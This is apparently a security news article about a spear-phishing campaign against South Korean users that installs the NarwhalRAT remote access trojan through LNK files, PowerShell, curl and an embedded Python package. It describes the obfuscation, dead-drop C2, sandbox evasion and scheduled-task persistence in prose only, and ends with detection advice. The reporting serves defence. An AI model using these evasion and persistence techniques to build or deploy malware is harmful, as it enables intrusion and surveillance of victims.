A new and sophisticated malware campaign has been identified, targeting users in South Korea through a deceptive and intricate method. The attack uses seemingly harmless shortcut files, leveraging built-in Windows utilities and a Python-based payload to install a remote access trojan known as NarwhalRAT. This operation is particularly notable for its ability to blend seamlessly with typical system activities, making detection difficult.
Deceptive Spear Phishing Tactics
The attack is initiated via spear phishing emails, masquerading as urgent security alerts from the ‘Microsoft Account Team’. Recipients are warned about suspicious activity related to one-time passwords and are urged to open an attached document, which is actually a ZIP archive containing a malicious LNK shortcut file.
Security experts from the Genians Security Center, in a report shared with Cyber Security News, highlighted the malware’s resemblance to a Python-based backdoor operation documented in May 2026. Dubbed NarwhalRAT, the malware appears to impersonate the popular South Korean browser, Naver Whale, as indicated by the string ‘naverwhale’ found within its code.
Targeted Attack on Korean Systems
NarwhalRAT predominantly focuses on Korean users, with its behavioral patterns underscoring this focus. The malware adopts ‘naverwhale’ as its working directory and utilizes Hidden and System file attributes to conceal its presence. It also manages KakaoTalk-related identifiers separately, suggesting a deliberate targeting of Korean applications.
The attackers employ a dual command-and-control (C2) infrastructure, utilizing a Korean relay server and the pCloud API as a Dead-drop Resolver. This setup enables them to alter the C2 address without modifying the malware itself, camouflaging network activity within normal web traffic and complicating detection efforts.
Advanced Loader and Execution Techniques
Upon activation of the malicious LNK file, a complex infection sequence is triggered. The file employs CMD environment variable substring substitution to obscure real commands, dynamically constructing strings like ‘powershell’ at runtime to avoid static analysis.
Following deobfuscation, it executes PowerShell with bypassed execution policies and uses a copied curl.exe to retrieve two files from the relay server. The first, a decoy HWP document, is displayed to the user, while the second, a batch script, initiates further installation processes discreetly.
This method, known as Living-off-the-Land, involves using native tools to evade detection. The batch script downloads an official Python embedded package, disguising the malware’s activities as normal software installation. The final payload, disguised as a Windows security catalog, is actually a Python bytecode backdoor loader.
NarwhalRAT’s Capabilities and Challenges
NarwhalRAT, once operational, functions as a comprehensive Remote Access Trojan, capable of avoiding sandbox environments like VMware and VirtualBox. Its command system, built on over 30 prefixes, allows remote execution of screen capture, keylogging, and more.
For persistence, the malware registers a scheduled task with a name mimicking legitimate Microsoft tasks, running at one-minute intervals to avoid detection by administrators. Security researchers emphasize the need for enhanced EDR policies to identify such sophisticated attacks leveraging LNK and PowerShell chains.
To mitigate the risk, organizations should implement behavioral rules to detect unusual scheduled task creation and monitor unexpected use of curl.exe and Python processes lacking visible console windows.
